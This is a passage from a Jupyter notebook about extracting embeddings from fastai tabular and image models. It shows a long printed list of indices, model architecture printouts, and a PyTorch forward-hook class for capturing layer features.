29576, 29577, 29578, 29579, 29580, 29581, 29582, 29583, 29584, 29585, 29586, 29587, 29588, 29589, 29590, 29591, 29592, 29593, 29594, 29595, 29596, 29597, 29598, 29599, 29600, 29601, 29602, 29603, 29604, 29605, 29606, 29607, 29608, 29609, 29610, 29611, 29612, 29613, 29614, 29615, 29616, 29617, 29618, 29619, 29620, 29621, 29622, 29623, 29624, 29625, 29626, 29627, 29628, 29629, 29630, 29631, 29632, 29633, 29634, 29635, 29636, 29637, 29638, 29639, 29640, 29641, 29642, 29643, 29644, 29645, 29646, 29647, 29648, 29649, 29650, 29651, 29652, 29653, 29654, 29655, 29656, 29657, 29658, 29659, 29660, 29661, 29662, 29663, 29664, 29665, 29666, 29667, 29668, 29669, 29670, 29671, 29672, 29673, 29674, 29675, 29676, 29677, 29678, 29679, 29680, 29681, 29682, 29683, 29684, 29685, 29686, 29687, 29688, 29689, 29690, 29691, 29692, 29693, 29694, 29695, 29696, 29697, 29698, 29699, 29700, 29701, 29702, 29703, 29704, 29705, 29706, 29707, 29708, 29709, 29710, 29711, 29712, 29713, 29714, 29715, 29716, 29717, 29718, 29719, 29720, 29721, 29722, 29723, 29724, 29725, 29726, 29727, 29728, 29729, 29730, 29731, 29732, 29733, 29734, 29735, 29736, 29737, 29738, 29739, 29740, 29741, 29742, 29743, 29744, 29745, 29746, 29747, 29748, 29749, 29750, 29751, 29752, 29753, 29754, 29755, 29756, 29757, 29758, 29759, 29760, 29761, 29762, 29763, 29764, 29765, 29766, 29767, 29768, 29769, 29770, 29771, 29772, 29773, 29774, 29775, 29776, 29777, 29778, 29779, 29780, 29781, 29782, 29783, 29784, 29785, 29786, 29787, 29788, 29789, 29790, 29791, 29792, 29793, 29794, 29795, 29796, 29797, 29798, 29799, 29800, 29801, 29802, 29803, 29804, 29805, 29806, 29807, 29808, 29809, 29810, 29811, 29812, 29813, 29814, 29815, 29816, 29817, 29818, 29819, 29820, 29821, 29822, 29823, 29824, 29825, 29826, 29827, 29828, 29829, 29830, 29831, 29832, 29833, 29834, 29835, 29836, 29837, 29838, 29839, 29840, 29841, 29842, 29843, 29844, 29845, 29846, 29847, 29848, 29849, 29850, 29851, 29852, 29853, 29854, 29855, 29856, 29857, 29858, 29859, 29860, 
29861, 29862, 29863, 29864, 29865, 29866, 29867, 29868, 29869, 29870, 29871, 29872, 29873, 29874, 29875, 29876, 29877, 29878, 29879, 29880, 29881, 29882, 29883, 29884, 29885, 29886, 29887, 29888, 29889, 29890, 29891, 29892, 29893, 29894, 29895, 29896, 29897, 29898, 29899, 29900, 29901, 29902, 29903, 29904, 29905, 29906, 29907, 29908, 29909, 29910, 29911, 29912, 29913, 29914, 29915, 29916, 29917, 29918, 29919, 29920, 29921, 29922, 29923, 29924, 29925, 29926, 29927, 29928, 29929, 29930, 29931, 29932, 29933, 29934, 29935, 29936, 29937, 29938, 29939, 29940, 29941, 29942, 29943, 29944, 29945, 29946, 29947, 29948, 29949, 29950, 29951, 29952, 29953, 29954, 29955, 29956, 29957, 29958, 29959, 29960, 29961, 29962, 29963, 29964, 29965, 29966, 29967, 29968, 29969, 29970, 29971, 29972, 29973, 29974, 29975, 29976, 29977, 29978, 29979, 29980, 29981, 29982, 29983, 29984, 29985, 29986, 29987, 29988, 29989, 29990, 29991, 29992, 29993, 29994, 29995, 29996, 29997, 29998, 29999, 30000, 30001, 30002, 30003, 30004, 30005, 30006, 30007, 30008, 30009, 30010, 30011, 30012, 30013, 30014, 30015, 30016, 30017, 30018, 30019, 30020, 30021, 30022, 30023, 30024, 30025, 30026, 30027, 30028, 30029, 30030, 30031, 30032, 30033, 30034, 30035, 30036, 30037, 30038, 30039, 30040, 30041, 30042, 30043, 30044, 30045, 30046, 30047, 30048, 30049, 30050, 30051, 30052, 30053, 30054, 30055, 30056, 30057, 30058, 30059, 30060, 30061, 30062, 30063, 30064, 30065, 30066, 30067, 30068, 30069, 30070, 30071, 30072, 30073, 30074, 30075, 30076, 30077, 30078, 30079, 30080, 30081, 30082, 30083, 30084, 30085, 30086, 30087, 30088, 30089, 30090, 30091, 30092, 30093, 30094, 30095, 30096, 30097, 30098, 30099, 30100, 30101, 30102, 30103, 30104, 30105, 30106, 30107, 30108, 30109, 30110, 30111, 30112, 30113, 30114, 30115, 30116, 30117, 30118, 30119, 30120, 30121, 30122, 30123, 30124, 30125, 30126, 30127, 30128, 30129, 30130, 30131, 30132, 30133, 30134, 30135, 30136, 30137, 30138, 30139, 30140, 30141, 30142, 30143, 30144, 30145, 
30146, 30147, 30148, 30149, 30150, 30151, 30152, 30153, 30154, 30155, 30156, 30157, 30158, 30159, 30160, 30161, 30162, 30163, 30164, 30165, 30166, 30167, 30168, 30169, 30170, 30171, 30172, 30173, 30174, 30175, 30176, 30177, 30178, 30179, 30180, 30181, 30182, 30183, 30184, 30185, 30186, 30187, 30188, 30189, 30190, 30191, 30192, 30193, 30194, 30195, 30196, 30197, 30198, 30199, 30200, 30201, 30202, 30203, 30204, 30205, 30206, 30207, 30208, 30209, 30210, 30211, 30212, 30213, 30214, 30215, 30216, 30217, 30218, 30219, 30220, 30221, 30222, 30223, 30224, 30225, 30226, 30227, 30228, 30229, 30230, 30231, 30232, 30233, 30234, 30235, 30236, 30237, 30238, 30239, 30240, 30241, 30242, 30243, 30244, 30245, 30246, 30247, 30248, 30249, 30250, 30251, 30252, 30253, 30254, 30255, 30256, 30257, 30258, 30259, 30260, 30261, 30262, 30263, 30264, 30265, 30266, 30267, 30268, 30269, 30270, 30271, 30272, 30273, 30274, 30275, 30276, 30277, 30278, 30279, 30280, 30281, 30282, 30283, 30284, 30285, 30286, 30287, 30288, 30289, 30290, 30291, 30292, 30293, 30294, 30295, 30296, 30297, 30298, 30299, 30300, 30301, 30302, 30303, 30304, 30305, 30306, 30307, 30308, 30309, 30310, 30311, 30312, 30313, 30314, 30315, 30316, 30317, 30318, 30319, 30320, 30321, 30322, 30323, 30324, 30325, 30326, 30327, 30328, 30329, 30330, 30331, 30332, 30333, 30334, 30335, 30336, 30337, 30338, 30339, 30340, 30341, 30342, 30343, 30344, 30345, 30346, 30347, 30348, 30349, 30350, 30351, 30352, 30353, 30354, 30355, 30356, 30357, 30358, 30359, 30360, 30361, 30362, 30363, 30364, 30365, 30366, 30367, 30368, 30369, 30370, 30371, 30372, 30373, 30374, 30375, 30376, 30377, 30378, 30379, 30380, 30381, 30382, 30383, 30384, 30385, 30386, 30387, 30388, 30389, 30390, 30391, 30392, 30393, 30394, 30395, 30396, 30397, 30398, 30399, 30400, 30401, 30402, 30403, 30404, 30405, 30406, 30407, 30408, 30409, 30410, 30411, 30412, 30413, 30414, 30415, 30416, 30417, 30418, 30419, 30420, 30421, 30422, 30423, 30424, 30425, 30426, 30427, 30428, 30429, 30430, 
30431, 30432, 30433, 30434, 30435, 30436, 30437, 30438, 30439, 30440, 30441, 30442, 30443, 30444, 30445, 30446, 30447, 30448, 30449, 30450, 30451, 30452, 30453, 30454, 30455, 30456, 30457, 30458, 30459, 30460, 30461, 30462, 30463, 30464, 30465, 30466, 30467, 30468, 30469, 30470, 30471, 30472, 30473, 30474, 30475, 30476, 30477, 30478, 30479, 30480, 30481, 30482, 30483, 30484, 30485, 30486, 30487, 30488, 30489, 30490, 30491, 30492, 30493, 30494, 30495, 30496, 30497, 30498, 30499, 30500, 30501, 30502, 30503, 30504, 30505, 30506, 30507, 30508, 30509, 30510, 30511, 30512, 30513, 30514, 30515, 30516, 30517, 30518, 30519, 30520, 30521, 30522, 30523, 30524, 30525, 30526, 30527, 30528, 30529, 30530, 30531, 30532, 30533, 30534, 30535, 30536, 30537, 30538, 30539, 30540, 30541, 30542, 30543, 30544, 30545, 30546, 30547, 30548, 30549, 30550, 30551, 30552, 30553, 30554, 30555, 30556, 30557, 30558, 30559, 30560, 30561, 30562, 30563, 30564, 30565, 30566, 30567, 30568, 30569, 30570, 30571, 30572, 30573, 30574, 30575, 30576, 30577, 30578, 30579, 30580, 30581, 30582, 30583, 30584, 30585, 30586, 30587, 30588, 30589, 30590, 30591, 30592, 30593, 30594, 30595, 30596, 30597, 30598, 30599, 30600, 30601, 30602, 30603, 30604, 30605, 30606, 30607, 30608, 30609, 30610, 30611, 30612, 30613, 30614, 30615, 30616, 30617, 30618, 30619, 30620, 30621, 30622, 30623, 30624, 30625, 30626, 30627, 30628, 30629, 30630, 30631, 30632, 30633, 30634, 30635, 30636, 30637, 30638, 30639, 30640, 30641, 30642, 30643, 30644, 30645, 30646, 30647, 30648, 30649, 30650, 30651, 30652, 30653, 30654, 30655, 30656, 30657, 30658, 30659, 30660, 30661, 30662, 30663, 30664, 30665, 30666, 30667, 30668, 30669, 30670, 30671, 30672, 30673, 30674, 30675, 30676, 30677, 30678, 30679, 30680, 30681, 30682, 30683, 30684, 30685, 30686, 30687, 30688, 30689, 30690, 30691, 30692, 30693, 30694, 30695, 30696, 30697, 30698, 30699, 30700, 30701, 30702, 30703, 30704, 30705, 30706, 30707, 30708, 30709, 30710, 30711, 30712, 30713, 30714, 30715, 
30716, 30717, 30718, 30719, 30720, 30721, 30722, 30723, 30724, 30725, 30726, 30727, 30728, 30729, 30730, 30731, 30732, 30733, 30734, 30735, 30736, 30737, 30738, 30739, 30740, 30741, 30742, 30743, 30744, 30745, 30746, 30747, 30748, 30749, 30750, 30751, 30752, 30753, 30754, 30755, 30756, 30757, 30758, 30759, 30760, 30761, 30762, 30763, 30764, 30765, 30766, 30767, 30768, 30769, 30770, 30771, 30772, 30773, 30774, 30775, 30776, 30777, 30778, 30779, 30780, 30781, 30782, 30783, 30784, 30785, 30786, 30787, 30788, 30789, 30790, 30791, 30792, 30793, 30794, 30795, 30796, 30797, 30798, 30799, 30800, 30801, 30802, 30803, 30804, 30805, 30806, 30807, 30808, 30809, 30810, 30811, 30812, 30813, 30814, 30815, 30816, 30817, 30818, 30819, 30820, 30821, 30822, 30823, 30824, 30825, 30826, 30827, 30828, 30829, 30830, 30831, 30832, 30833, 30834, 30835, 30836, 30837, 30838, 30839, 30840, 30841, 30842, 30843, 30844, 30845, 30846, 30847, 30848, 30849, 30850, 30851, 30852, 30853, 30854, 30855, 30856, 30857, 30858, 30859, 30860, 30861, 30862, 30863, 30864, 30865, 30866, 30867, 30868, 30869, 30870, 30871, 30872, 30873, 30874, 30875, 30876, 30877, 30878, 30879, 30880, 30881, 30882, 30883, 30884, 30885, 30886, 30887, 30888, 30889, 30890, 30891, 30892, 30893, 30894, 30895, 30896, 30897, 30898, 30899, 30900, 30901, 30902, 30903, 30904, 30905, 30906, 30907, 30908, 30909, 30910, 30911, 30912, 30913, 30914, 30915, 30916, 30917, 30918, 30919, 30920, 30921, 30922, 30923, 30924, 30925, 30926, 30927, 30928, 30929, 30930, 30931, 30932, 30933, 30934, 30935, 30936, 30937, 30938, 30939, 30940, 30941, 30942, 30943, 30944, 30945, 30946, 30947, 30948, 30949, 30950, 30951, 30952, 30953, 30954, 30955, 30956, 30957, 30958, 30959, 30960, 30961, 30962, 30963, 30964, 30965, 30966, 30967, 30968, 30969, 30970, 30971, 30972, 30973, 30974, 30975, 30976, 30977, 30978, 30979, 30980, 30981, 30982, 30983, 30984, 30985, 30986, 30987, 30988, 30989, 30990, 30991, 30992, 30993, 30994, 30995, 30996, 30997, 30998, 30999, 31000, 
31001, 31002, 31003, 31004, 31005, 31006, 31007, 31008, 31009, 31010, 31011, 31012, 31013, 31014, 31015, 31016, 31017, 31018, 31019, 31020, 31021, 31022, 31023, 31024, 31025, 31026, 31027, 31028, 31029, 31030, 31031, 31032, 31033, 31034, 31035, 31036, 31037, 31038, 31039, 31040, 31041, 31042, 31043, 31044, 31045, 31046, 31047, 31048, 31049, 31050, 31051, 31052, 31053, 31054, 31055, 31056, 31057, 31058, 31059, 31060, 31061, 31062, 31063, 31064, 31065, 31066, 31067, 31068, 31069, 31070, 31071, 31072, 31073, 31074, 31075, 31076, 31077, 31078, 31079, 31080, 31081, 31082, 31083, 31084, 31085, 31086, 31087, 31088, 31089, 31090, 31091, 31092, 31093, 31094, 31095, 31096, 31097, 31098, 31099, 31100, 31101, 31102, 31103, 31104, 31105, 31106, 31107, 31108, 31109, 31110, 31111, 31112, 31113, 31114, 31115, 31116, 31117, 31118, 31119, 31120, 31121, 31122, 31123, 31124, 31125, 31126, 31127, 31128, 31129, 31130, 31131, 31132, 31133, 31134, 31135, 31136, 31137, 31138, 31139, 31140, 31141, 31142, 31143, 31144, 31145, 31146, 31147, 31148, 31149, 31150, 31151, 31152, 31153, 31154, 31155, 31156, 31157, 31158, 31159, 31160, 31161, 31162, 31163, 31164, 31165, 31166, 31167, 31168, 31169, 31170, 31171, 31172, 31173, 31174, 31175, 31176, 31177, 31178, 31179, 31180, 31181, 31182, 31183, 31184, 31185, 31186, 31187, 31188, 31189, 31190, 31191, 31192, 31193, 31194, 31195, 31196, 31197, 31198, 31199, 31200, 31201, 31202, 31203, 31204, 31205, 31206, 31207, 31208, 31209, 31210, 31211, 31212, 31213, 31214, 31215, 31216, 31217, 31218, 31219, 31220, 31221, 31222, 31223, 31224, 31225, 31226, 31227, 31228, 31229, 31230, 31231, 31232, 31233, 31234, 31235, 31236, 31237, 31238, 31239, 31240, 31241, 31242, 31243, 31244, 31245, 31246, 31247, 31248, 31249, 31250, 31251, 31252, 31253, 31254, 31255, 31256, 31257, 31258, 31259, 31260, 31261, 31262, 31263, 31264, 31265, 31266, 31267, 31268, 31269, 31270, 31271, 31272, 31273, 31274, 31275, 31276, 31277, 31278, 31279, 31280, 31281, 31282, 31283, 31284, 31285, 
31286, 31287, 31288, 31289, 31290, 31291, 31292, 31293, 31294, 31295, 31296, 31297, 31298, 31299, 31300, 31301, 31302, 31303, 31304, 31305, 31306, 31307, 31308, 31309, 31310, 31311, 31312, 31313, 31314, 31315, 31316, 31317, 31318, 31319, 31320, 31321, 31322, 31323, 31324, 31325, 31326, 31327, 31328, 31329, 31330, 31331, 31332, 31333, 31334, 31335, 31336, 31337, 31338, 31339, 31340, 31341, 31342, 31343, 31344, 31345, 31346, 31347, 31348, 31349, 31350, 31351, 31352, 31353, 31354, 31355, 31356, 31357, 31358, 31359, 31360, 31361, 31362, 31363, 31364, 31365, 31366, 31367, 31368, 31369, 31370, 31371, 31372, 31373, 31374, 31375, 31376, 31377, 31378, 31379, 31380, 31381, 31382, 31383, 31384, 31385, 31386, 31387, 31388, 31389, 31390, 31391, 31392, 31393, 31394, 31395, 31396, 31397, 31398, 31399, 31400, 31401, 31402, 31403, 31404, 31405, 31406, 31407, 31408, 31409, 31410, 31411, 31412, 31413, 31414, 31415, 31416, 31417, 31418, 31419, 31420, 31421, 31422, 31423, 31424, 31425, 31426, 31427, 31428, 31429, 31430, 31431, 31432, 31433, 31434, 31435, 31436, 31437, 31438, 31439, 31440, 31441, 31442, 31443, 31444, 31445, 31446, 31447, 31448, 31449, 31450, 31451, 31452, 31453, 31454, 31455, 31456, 31457, 31458, 31459, 31460, 31461, 31462, 31463, 31464, 31465, 31466, 31467, 31468, 31469, 31470, 31471, 31472, 31473, 31474, 31475, 31476, 31477, 31478, 31479, 31480, 31481, 31482, 31483, 31484, 31485, 31486, 31487, 31488, 31489, 31490, 31491, 31492, 31493, 31494, 31495, 31496, 31497, 31498, 31499, 31500, 31501, 31502, 31503, 31504, 31505, 31506, 31507, 31508, 31509, 31510, 31511, 31512, 31513, 31514, 31515, 31516, 31517, 31518, 31519, 31520, 31521, 31522, 31523, 31524, 31525, 31526, 31527, 31528, 31529, 31530, 31531, 31532, 31533, 31534, 31535, 31536, 31537, 31538, 31539, 31540, 31541, 31542, 31543, 31544, 31545, 31546, 31547, 31548, 31549, 31550, 31551, 31552, 31553, 31554, 31555, 31556, 31557, 31558, 31559, 31560, 31561, 31562, 31563, 31564, 31565, 31566, 31567, 31568, 31569, 31570, 
31571, 31572, 31573, 31574, 31575, 31576, 31577, 31578, 31579, 31580, 31581, 31582, 31583, 31584, 31585, 31586, 31587, 31588, 31589, 31590, 31591, 31592, 31593, 31594, 31595, 31596, 31597, 31598, 31599, 31600, 31601, 31602, 31603, 31604, 31605, 31606, 31607, 31608, 31609, 31610, 31611, 31612, 31613, 31614, 31615, 31616, 31617, 31618, 31619, 31620, 31621, 31622, 31623, 31624, 31625, 31626, 31627, 31628, 31629, 31630, 31631, 31632, 31633, 31634, 31635, 31636, 31637, 31638, 31639, 31640, 31641, 31642, 31643, 31644, 31645, 31646, 31647, 31648, 31649, 31650, 31651, 31652, 31653, 31654, 31655, 31656, 31657, 31658, 31659, 31660, 31661, 31662, 31663, 31664, 31665, 31666, 31667, 31668, 31669, 31670, 31671, 31672, 31673, 31674, 31675, 31676, 31677, 31678, 31679, 31680, 31681, 31682, 31683, 31684, 31685, 31686, 31687, 31688, 31689, 31690, 31691, 31692, 31693, 31694, 31695, 31696, 31697, 31698, 31699, 31700, 31701, 31702, 31703, 31704, 31705, 31706, 31707, 31708, 31709, 31710, 31711, 31712, 31713, 31714, 31715, 31716, 31717, 31718, 31719, 31720, 31721, 31722, 31723, 31724, 31725, 31726, 31727, 31728, 31729, 31730, 31731, 31732, 31733, 31734, 31735, 31736, 31737, 31738, 31739, 31740, 31741, 31742, 31743, 31744, 31745, 31746, 31747, 31748, 31749, 31750, 31751, 31752, 31753, 31754, 31755, 31756, 31757, 31758, 31759, 31760, 31761, 31762, 31763, 31764, 31765, 31766, 31767, 31768, 31769, 31770, 31771, 31772, 31773, 31774, 31775, 31776, 31777, 31778, 31779, 31780, 31781, 31782, 31783, 31784, 31785, 31786, 31787, 31788, 31789, 31790, 31791, 31792, 31793, 31794, 31795, 31796, 31797, 31798, 31799, 31800, 31801, 31802, 31803, 31804, 31805, 31806, 31807, 31808, 31809, 31810, 31811, 31812, 31813, 31814, 31815, 31816, 31817, 31818, 31819, 31820, 31821, 31822, 31823, 31824, 31825, 31826, 31827, 31828, 31829, 31830, 31831, 31832, 31833, 31834, 31835, 31836, 31837, 31838, 31839, 31840, 31841, 31842, 31843, 31844, 31845, 31846, 31847, 31848, 31849, 31850, 31851, 31852, 31853, 31854, 31855, 
31856, 31857, 31858, 31859, 31860, 31861, 31862, 31863, 31864, 31865, 31866, 31867, 31868, 31869, 31870, 31871, 31872, 31873, 31874, 31875, 31876, 31877, 31878, 31879, 31880, 31881, 31882, 31883, 31884, 31885, 31886, 31887, 31888, 31889, 31890, 31891, 31892, 31893, 31894, 31895, 31896, 31897, 31898, 31899, 31900, 31901, 31902, 31903, 31904, 31905, 31906, 31907, 31908, 31909, 31910, 31911, 31912, 31913, 31914, 31915, 31916, 31917, 31918, 31919, 31920, 31921, 31922, 31923, 31924, 31925, 31926, 31927, 31928, 31929, 31930, 31931, 31932, 31933, 31934, 31935, 31936, 31937, 31938, 31939, 31940, 31941, 31942, 31943, 31944, 31945, 31946, 31947, 31948, 31949, 31950, 31951, 31952, 31953, 31954, 31955, 31956, 31957, 31958, 31959, 31960, 31961, 31962, 31963, 31964, 31965, 31966, 31967, 31968, 31969, 31970, 31971, 31972, 31973, 31974, 31975, 31976, 31977, 31978, 31979, 31980, 31981, 31982, 31983, 31984, 31985, 31986, 31987, 31988, 31989, 31990, 31991, 31992, 31993, 31994, 31995, 31996, 31997, 31998, 31999, 32000, 32001, 32002, 32003, 32004, 32005, 32006, 32007, 32008, 32009, 32010, 32011, 32012, 32013, 32014, 32015, 32016, 32017, 32018, 32019, 32020, 32021, 32022, 32023, 32024, 32025, 32026, 32027, 32028, 32029, 32030, 32031, 32032, 32033, 32034, 32035, 32036, 32037, 32038, 32039, 32040, 32041, 32042, 32043, 32044, 32045, 32046, 32047, 32048, 32049, 32050, 32051, 32052, 32053, 32054, 32055, 32056, 32057, 32058, 32059, 32060, 32061, 32062, 32063, 32064, 32065, 32066, 32067, 32068, 32069, 32070, 32071, 32072, 32073, 32074, 32075, 32076, 32077, 32078, 32079, 32080, 32081, 32082, 32083, 32084, 32085, 32086, 32087, 32088, 32089, 32090, 32091, 32092, 32093, 32094, 32095, 32096, 32097, 32098, 32099, 32100, 32101, 32102, 32103, 32104, 32105, 32106, 32107, 32108, 32109, 32110, 32111, 32112, 32113, 32114, 32115, 32116, 32117, 32118, 32119, 32120, 32121, 32122, 32123, 32124, 32125, 32126, 32127, 32128, 32129, 32130, 32131, 32132, 32133, 32134, 32135, 32136, 32137, 32138, 32139, 32140, 
32141, 32142, 32143, 32144, 32145, 32146, 32147, 32148, 32149, 32150, 32151, 32152, 32153, 32154, 32155, 32156, 32157, 32158, 32159, 32160, 32161, 32162, 32163, 32164, 32165, 32166, 32167, 32168, 32169, 32170, 32171, 32172, 32173, 32174, 32175, 32176, 32177, 32178, 32179, 32180, 32181, 32182, 32183, 32184, 32185, 32186, 32187, 32188, 32189, 32190, 32191, 32192, 32193, 32194, 32195, 32196, 32197, 32198, 32199, 32200, 32201, 32202, 32203, 32204, 32205, 32206, 32207, 32208, 32209, 32210, 32211, 32212, 32213, 32214, 32215, 32216, 32217, 32218, 32219, 32220, 32221, 32222, 32223, 32224, 32225, 32226, 32227, 32228, 32229, 32230, 32231, 32232, 32233, 32234, 32235, 32236, 32237, 32238, 32239, 32240, 32241, 32242, 32243, 32244, 32245, 32246, 32247, 32248, 32249, 32250, 32251, 32252, 32253, 32254, 32255, 32256, 32257, 32258, 32259, 32260, 32261, 32262, 32263, 32264, 32265, 32266, 32267, 32268, 32269, 32270, 32271, 32272, 32273, 32274, 32275, 32276, 32277, 32278, 32279, 32280, 32281, 32282, 32283, 32284, 32285, 32286, 32287, 32288, 32289, 32290, 32291, 32292, 32293, 32294, 32295, 32296, 32297, 32298, 32299, 32300, 32301, 32302, 32303, 32304, 32305, 32306, 32307, 32308, 32309, 32310, 32311, 32312, 32313, 32314, 32315, 32316, 32317, 32318, 32319, 32320, 32321, 32322, 32323, 32324, 32325, 32326, 32327, 32328, 32329, 32330, 32331, 32332, 32333, 32334, 32335, 32336, 32337, 32338, 32339, 32340, 32341, 32342, 32343, 32344, 32345, 32346, 32347, 32348, 32349, 32350, 32351, 32352, 32353, 32354, 32355, 32356, 32357, 32358, 32359, 32360, 32361, 32362, 32363, 32364, 32365, 32366, 32367, 32368, 32369, 32370, 32371, 32372, 32373, 32374, 32375, 32376, 32377, 32378, 32379, 32380, 32381, 32382, 32383, 32384, 32385, 32386, 32387, 32388, 32389, 32390, 32391, 32392, 32393, 32394, 32395, 32396, 32397, 32398, 32399, 32400, 32401, 32402, 32403, 32404, 32405, 32406, 32407, 32408, 32409, 32410, 32411, 32412, 32413, 32414, 32415, 32416, 32417, 32418, 32419, 32420, 32421, 32422, 32423, 32424, 32425, 
32426, 32427, 32428, 32429, 32430, 32431, 32432, 32433, 32434, 32435, 32436, 32437, 32438, 32439, 32440, 32441, 32442, 32443, 32444, 32445, 32446, 32447, 32448, 32449, 32450, 32451, 32452, 32453, 32454, 32455, 32456, 32457, 32458, 32459, 32460, 32461, 32462, 32463, 32464, 32465, 32466, 32467, 32468, 32469, 32470, 32471, 32472, 32473, 32474, 32475, 32476, 32477, 32478, 32479, 32480, 32481, 32482, 32483, 32484, 32485, 32486, 32487, 32488, 32489, 32490, 32491, 32492, 32493, 32494, 32495, 32496, 32497, 32498, 32499, 32500, 32501, 32502, 32503, 32504, 32505, 32506, 32507, 32508, 32509, 32510, 32511, 32512, 32513, 32514, 32515, 32516, 32517, 32518, 32519, 32520, 32521, 32522, 32523, 32524, 32525, 32526, 32527, 32528, 32529, 32530, 32531, 32532, 32533, 32534, 32535, 32536, 32537, 32538, 32539, 32540, 32541, 32542, 32543, 32544, 32545, 32546, 32547, 32548, 32549, 32550, 32551, 32552, 32553, 32554, 32555, 32556, 32557, 32558, 32559, 32560]\n" ], [ "# understand the model architecture\nprint(tab_learn.model)\n\n# identify layer from where embeddings are extracted\ntab_learn.model.layers[1][0]", "TabularModel(\n (embeds): ModuleList(\n (0): Embedding(74, 18)\n (1): Embedding(117, 23)\n (2): Embedding(90, 20)\n (3): Embedding(17, 8)\n (4): Embedding(93, 20)\n (5): Embedding(8, 5)\n (6): Embedding(43, 13)\n (7): Embedding(16, 8)\n (8): Embedding(6, 4)\n (9): Embedding(7, 5)\n (10): Embedding(3, 3)\n (11): Embedding(10, 6)\n (12): Embedding(3, 3)\n )\n (emb_drop): Dropout(p=0.0, inplace=False)\n (bn_cont): BatchNorm1d(2, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (layers): Sequential(\n (0): LinBnDrop(\n (0): Linear(in_features=138, out_features=200, bias=False)\n (1): ReLU(inplace=True)\n (2): BatchNorm1d(200, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (1): LinBnDrop(\n (0): Linear(in_features=200, out_features=100, bias=False)\n (1): ReLU(inplace=True)\n (2): BatchNorm1d(100, eps=1e-05, momentum=0.1, affine=True, 
track_running_stats=True)\n )\n (2): LinBnDrop(\n (0): Linear(in_features=100, out_features=2, bias=True)\n )\n )\n)\n" ] ], [ [ "## experiment: get_fastai_imgs_embs\n\nTo extract image embedding, check out this post\n\n- https://www.kaggle.com/code/abhikjha/fastai-pytorch-hooks-random-forest/notebook#Fastai---Tabular", "_____no_output_____" ] ], [ [ "# pytorch hook\nclass SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()", "_____no_output_____" ], [ "print(img_clf.model)\n# identify the layer from which you want to get embeddings \nimg_clf.model[1][4]", "Sequential(\n (0): Sequential(\n (0): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (2): ReLU(inplace=True)\n (3): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)\n (4): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (1): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, 
affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (5): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (3): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 
